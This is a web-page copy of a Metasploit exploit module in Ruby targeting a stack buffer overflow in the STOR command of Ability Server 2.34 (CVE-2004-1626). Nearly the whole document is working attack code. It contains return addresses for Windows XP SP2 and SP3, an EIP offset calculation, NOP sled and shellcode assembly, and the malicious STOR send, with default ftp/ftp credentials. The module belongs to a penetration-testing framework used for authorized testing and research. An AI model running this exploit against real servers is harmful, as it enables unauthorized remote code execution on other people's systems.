Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/ftp/ability_server_stor.rb
19850 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Ftp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Ability Server 2.34 STOR Command Stack Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a stack-based buffer overflow in Ability Server 2.34.

18
          Ability Server fails to check input size when parsing 'STOR' and 'APPE' commands,

19
          which leads to a stack based buffer overflow. This plugin uses the 'STOR' command.

20


21
          The vulnerability has been confirmed on version 2.34 and has also been reported

22
          in version 2.25 and 2.32. Other versions may also be affected.

23
        },

24
        'Author' => [

25
          'muts', # Initial discovery

26
          'Dark Eagle',     # same as muts

27
          'Peter Osterberg' # Metasploit

28
        ],

29
        'License' => MSF_LICENSE,

30
        'References' => [

31
          [ 'CVE', '2004-1626' ],

32
          [ 'OSVDB', '11030'],

33
          [ 'EDB', '588'],

34
        ],

35
        'DefaultOptions' => {

36
          'EXITFUNC' => 'process'

37
        },

38
        'Privileged' => false,

39
        'Payload' => {

40
          'Space' => 1000,

41
          'BadChars' => "\x00\xff"

42
        },

43
        'Platform' => 'win',

44
        'Targets' => [

45
          [

46
            'Windows XP SP2 ENG',

47
            {

48
              # JMP ESP  (MFC42.dll. Addr remains unchanged until a patched SP3)

49
              'Ret' => 0x73E32ECF,

50
              'Offset' => 966

51
            }

52
          ],

53
          [

54
            'Windows XP SP3 ENG',

55
            {

56
              # JMP ESP  (USER32.dll. Unchanged unpatched SP3 - fully pathced)

57
              'Ret' => 0x7E429353,

58
              'Offset' => 966

59
            }

60
          ],

61
        ],

62
        'DisclosureDate' => '2004-10-22',

63
        'Notes' => {

64
          'Reliability' => UNKNOWN_RELIABILITY,

65
          'Stability' => UNKNOWN_STABILITY,

66
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

67
        }

68
      )

69
    )

70


71
    register_options(

72
      [

73
        Opt::RPORT(21),

74
        OptString.new('FTPUSER', [ true, 'Valid FTP username', 'ftp' ], fallbacks: ['USERNAME']),

75
        OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'ftp' ], fallbacks: ['PASSWORD'])

76
      ]

77
    )

78
  end

79


80
  def check

81
    connect

82
    disconnect

83
    if banner =~ /Ability Server 2\.34/

84
      return Exploit::CheckCode::Appears

85
    else

86
      if banner =~ /Ability Server/

87
        return Exploit::CheckCode::Detected

88
      end

89
    end

90


91
    return Exploit::CheckCode::Safe

92
  end

93


94
  def exploit

95
    c = connect_login

96
    return if not c

97


98
    myhost = datastore['LHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['LHOST']

99


100
    # Take client ip + ftp user lengths into account for EIP offset

101
    padd_size = target['Offset'] + (13 - myhost.length) + (3 - datastore['FTPUSER'].length)

102
    junk = rand_text_alpha(padd_size)

103


104
    sploit = junk

105
    sploit << [target.ret].pack('V')

106
    sploit << make_nops(32)

107
    sploit << payload.encoded

108
    sploit << rand_text_alpha(sploit.length)

109


110
    send_cmd(['STOR', sploit], false)

111
    handler

112
    disconnect

113
  end

114
end

115


116